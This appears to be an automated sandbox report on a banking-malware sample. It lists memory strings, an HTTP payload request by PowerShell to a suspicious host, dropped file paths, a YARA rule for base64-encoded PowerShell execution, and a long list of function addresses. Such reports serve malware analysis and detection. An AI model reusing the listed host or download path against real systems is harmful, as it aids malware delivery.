Source: svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000A.00000002.319116790.000001C280013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.319294757.000001C28003D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000003.318429966.000001C280040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318500901.000001C280045000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000A.00000003.295522877.000001C280031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318593022.000001C28003A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000A.00000002.319333412.000001C28004B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.318133437.000001C280049000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000016.00000003.409918608.0000019AC655D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 00000016.00000003.403457617.0000019AC6A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403341632.0000019AC6A03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403309481.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403251071.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403390455.0000019AC65A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.403218435.0000019AC6599000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.pango.co/privacy
Source: svchost.exe, 00000016.00000003.412280147.0000019AC6A02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.412123410.0000019AC659A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: unknown

DNS traffic detected: queries for: www.jsonsintl.com

Source: C:\Windows\System32\regsvr32.exe

Code function: 17_2_0000000180006B24 InternetReadFile,

17_2_0000000180006B24

Source: global traffic

HTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.jsonsintl.comConnection: Keep-Alive

E-Banking Fraud

Source: Yara match	File source: 16.2.regsvr32.exe.28c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.regsvr32.exe.28c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.323155942.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.505781692.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.505000054.0000000000C60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: Process Memory Space: powershell.exe PID: 6408, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP

Jump to dropped file

Source: Process Memory Space: powershell.exe PID: 6408, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Windows\system32\AHWppkeB\

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00007FFC65CF12B0		16_2_00007FFC65CF12B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00007FFC65CF4A70		16_2_00007FFC65CF4A70
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00007FFC65CF5E01		16_2_00007FFC65CF5E01
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00007FFC65CF5CAD		16_2_00007FFC65CF5CAD
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00007FFC65CF6850		16_2_00007FFC65CF6850
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00007FFC65CF443C		16_2_00007FFC65CF443C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00007FFC65CF53FB		16_2_00007FFC65CF53FB
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_010E0000		16_2_010E0000
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180006414		16_2_0000000180006414
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180005C74		16_2_0000000180005C74
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018002ACE8		16_2_000000018002ACE8
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180024104		16_2_0000000180024104
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180020118		16_2_0000000180020118
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000359C		16_2_000000018000359C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000E99C		16_2_000000018000E99C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180019628		16_2_0000000180019628
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180025A4C		16_2_0000000180025A4C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018002B7B2		16_2_000000018002B7B2
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180009408		16_2_0000000180009408
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180023C14		16_2_0000000180023C14
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018002582C		16_2_000000018002582C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000B834		16_2_000000018000B834
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000403C		16_2_000000018000403C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180021444		16_2_0000000180021444
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180012044		16_2_0000000180012044
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180016054		16_2_0000000180016054
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001705C		16_2_000000018001705C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180001870		16_2_0000000180001870
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001F878		16_2_000000018001F878
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180014484		16_2_0000000180014484
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180015494		16_2_0000000180015494
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000BC98		16_2_000000018000BC98
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180008C9C		16_2_0000000180008C9C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800078A4		16_2_00000001800078A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001F0A8		16_2_000000018001F0A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001E4AC		16_2_000000018001E4AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800048B0		16_2_00000001800048B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001ACB4		16_2_000000018001ACB4
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800090B4		16_2_00000001800090B4
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800270C0		16_2_00000001800270C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800024C0		16_2_00000001800024C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800280C8		16_2_00000001800280C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800050D4		16_2_00000001800050D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800234D8		16_2_00000001800234D8
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800150F0		16_2_00000001800150F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180012500		16_2_0000000180012500
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001A10C		16_2_000000018001A10C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180028D10		16_2_0000000180028D10
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001A524		16_2_000000018001A524
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180002D28		16_2_0000000180002D28
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000E130		16_2_000000018000E130
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180029134		16_2_0000000180029134
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180008134		16_2_0000000180008134
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180022140		16_2_0000000180022140
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180006954		16_2_0000000180006954
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000F554		16_2_000000018000F554
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018002B564		16_2_000000018002B564
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180012168		16_2_0000000180012168
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180013568		16_2_0000000180013568
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180024570		16_2_0000000180024570
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180019178		16_2_0000000180019178
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180025180		16_2_0000000180025180
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180001980		16_2_0000000180001980
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180021588		16_2_0000000180021588
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001A988		16_2_000000018001A988
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180018190		16_2_0000000180018190
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180013994		16_2_0000000180013994
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180028998		16_2_0000000180028998
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800061A0		16_2_00000001800061A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800135A6		16_2_00000001800135A6
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180016DA8		16_2_0000000180016DA8
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800059AC		16_2_00000001800059AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800135B4		16_2_00000001800135B4
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001C1B8		16_2_000000018001C1B8
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800025B8		16_2_00000001800025B8
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800085BC		16_2_00000001800085BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800015C0		16_2_00000001800015C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800295C8		16_2_00000001800295C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800229CC		16_2_00000001800229CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000E5D4		16_2_000000018000E5D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018002A5D8		16_2_000000018002A5D8
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800261E0		16_2_00000001800261E0
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800079EC		16_2_00000001800079EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180023624		16_2_0000000180023624
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180018628		16_2_0000000180018628
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180017E2C		16_2_0000000180017E2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180017638		16_2_0000000180017638
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180004E3C		16_2_0000000180004E3C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180020E40		16_2_0000000180020E40
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180015A64		16_2_0000000180015A64
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180015264		16_2_0000000180015264
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000A26C		16_2_000000018000A26C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180007678		16_2_0000000180007678
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001667C		16_2_000000018001667C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180012680		16_2_0000000180012680
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180001E88		16_2_0000000180001E88
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000968C		16_2_000000018000968C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180022290		16_2_0000000180022290
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180026A90		16_2_0000000180026A90
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000529C		16_2_000000018000529C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180020AA0		16_2_0000000180020AA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180022AAC		16_2_0000000180022AAC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180007EB4		16_2_0000000180007EB4
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800162BC		16_2_00000001800162BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800252C0		16_2_00000001800252C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001AEC8		16_2_000000018001AEC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001F6DC		16_2_000000018001F6DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800026DC		16_2_00000001800026DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180002ADC		16_2_0000000180002ADC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001E2F4		16_2_000000018001E2F4
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180016AF4		16_2_0000000180016AF4
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000DEF4		16_2_000000018000DEF4
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001DEFC		16_2_000000018001DEFC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180006308		16_2_0000000180006308
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001370C		16_2_000000018001370C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180004B18		16_2_0000000180004B18
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180015F24		16_2_0000000180015F24
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180006B24		16_2_0000000180006B24
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000F328		16_2_000000018000F328
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180021738		16_2_0000000180021738
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018002AF38		16_2_000000018002AF38
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180028348		16_2_0000000180028348
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000DB4C		16_2_000000018000DB4C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180014F50		16_2_0000000180014F50
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000B350		16_2_000000018000B350
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000A758		16_2_000000018000A758
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018002975C		16_2_000000018002975C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180024370		16_2_0000000180024370
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180008370		16_2_0000000180008370
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180015774		16_2_0000000180015774
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180012378		16_2_0000000180012378
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180026B98		16_2_0000000180026B98
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001CF9C		16_2_000000018001CF9C
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001EBA0		16_2_000000018001EBA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018001B3A4		16_2_000000018001B3A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000D7AC		16_2_000000018000D7AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800053B0		16_2_00000001800053B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180015BB8		16_2_0000000180015BB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800207BC		16_2_00000001800207BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000FFC0		16_2_000000018000FFC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_00000001800173DC		16_2_00000001800173DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180018BDC		16_2_0000000180018BDC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00C30000		17_2_00C30000
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180006414		17_2_0000000180006414
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000C819		17_2_000000018000C819
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180019628		17_2_0000000180019628
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180025A4C		17_2_0000000180025A4C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180012864		17_2_0000000180012864
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180005C74		17_2_0000000180005C74
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800248B0		17_2_00000001800248B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800252C0		17_2_00000001800252C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180006B24		17_2_0000000180006B24
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180006F2C		17_2_0000000180006F2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000A758		17_2_000000018000A758
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180024570		17_2_0000000180024570
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000E99C		17_2_000000018000E99C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001B3A4		17_2_000000018001B3A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800079EC		17_2_00000001800079EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180009408		17_2_0000000180009408
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180023C14		17_2_0000000180023C14
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180023624		17_2_0000000180023624
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180018628		17_2_0000000180018628
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018002582C		17_2_000000018002582C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180017E2C		17_2_0000000180017E2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000B834		17_2_000000018000B834
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180017638		17_2_0000000180017638
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000403C		17_2_000000018000403C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180004E3C		17_2_0000000180004E3C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180020E40		17_2_0000000180020E40
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180021444		17_2_0000000180021444
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180012044		17_2_0000000180012044
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180016054		17_2_0000000180016054
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001705C		17_2_000000018001705C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180015A64		17_2_0000000180015A64
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180015264		17_2_0000000180015264
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000A26C		17_2_000000018000A26C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180001870		17_2_0000000180001870
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001F878		17_2_000000018001F878
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180007678		17_2_0000000180007678
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001667C		17_2_000000018001667C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180012680		17_2_0000000180012680
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180014484		17_2_0000000180014484
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180001E88		17_2_0000000180001E88
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000968C		17_2_000000018000968C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180022290		17_2_0000000180022290
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180026A90		17_2_0000000180026A90
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180015494		17_2_0000000180015494
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000BC98		17_2_000000018000BC98
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000529C		17_2_000000018000529C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180008C9C		17_2_0000000180008C9C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180020AA0		17_2_0000000180020AA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800078A4		17_2_00000001800078A4
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001F0A8		17_2_000000018001F0A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180022AAC		17_2_0000000180022AAC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001E4AC		17_2_000000018001E4AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800048B0		17_2_00000001800048B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001ACB4		17_2_000000018001ACB4
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180007EB4		17_2_0000000180007EB4
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800090B4		17_2_00000001800090B4
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800162BC		17_2_00000001800162BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800270C0		17_2_00000001800270C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800024C0		17_2_00000001800024C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800280C8		17_2_00000001800280C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001AEC8		17_2_000000018001AEC8
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800050D4		17_2_00000001800050D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800234D8		17_2_00000001800234D8
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001F6DC		17_2_000000018001F6DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800026DC		17_2_00000001800026DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180002ADC		17_2_0000000180002ADC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018002ACE8		17_2_000000018002ACE8
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800150F0		17_2_00000001800150F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001E2F4		17_2_000000018001E2F4
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180016AF4		17_2_0000000180016AF4
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000DEF4		17_2_000000018000DEF4
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001DEFC		17_2_000000018001DEFC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180012500		17_2_0000000180012500
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180024104		17_2_0000000180024104
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180006308		17_2_0000000180006308
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001370C		17_2_000000018001370C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001A10C		17_2_000000018001A10C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180028D10		17_2_0000000180028D10
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180020118		17_2_0000000180020118
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180004B18		17_2_0000000180004B18
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001A524		17_2_000000018001A524
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180015F24		17_2_0000000180015F24
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000F328		17_2_000000018000F328
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180002D28		17_2_0000000180002D28
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000E130		17_2_000000018000E130
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180029134		17_2_0000000180029134
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180008134		17_2_0000000180008134
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180021738		17_2_0000000180021738
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018002AF38		17_2_000000018002AF38
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180022140		17_2_0000000180022140
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180028348		17_2_0000000180028348
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000DB4C		17_2_000000018000DB4C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180014F50		17_2_0000000180014F50
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000B350		17_2_000000018000B350
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180006954		17_2_0000000180006954
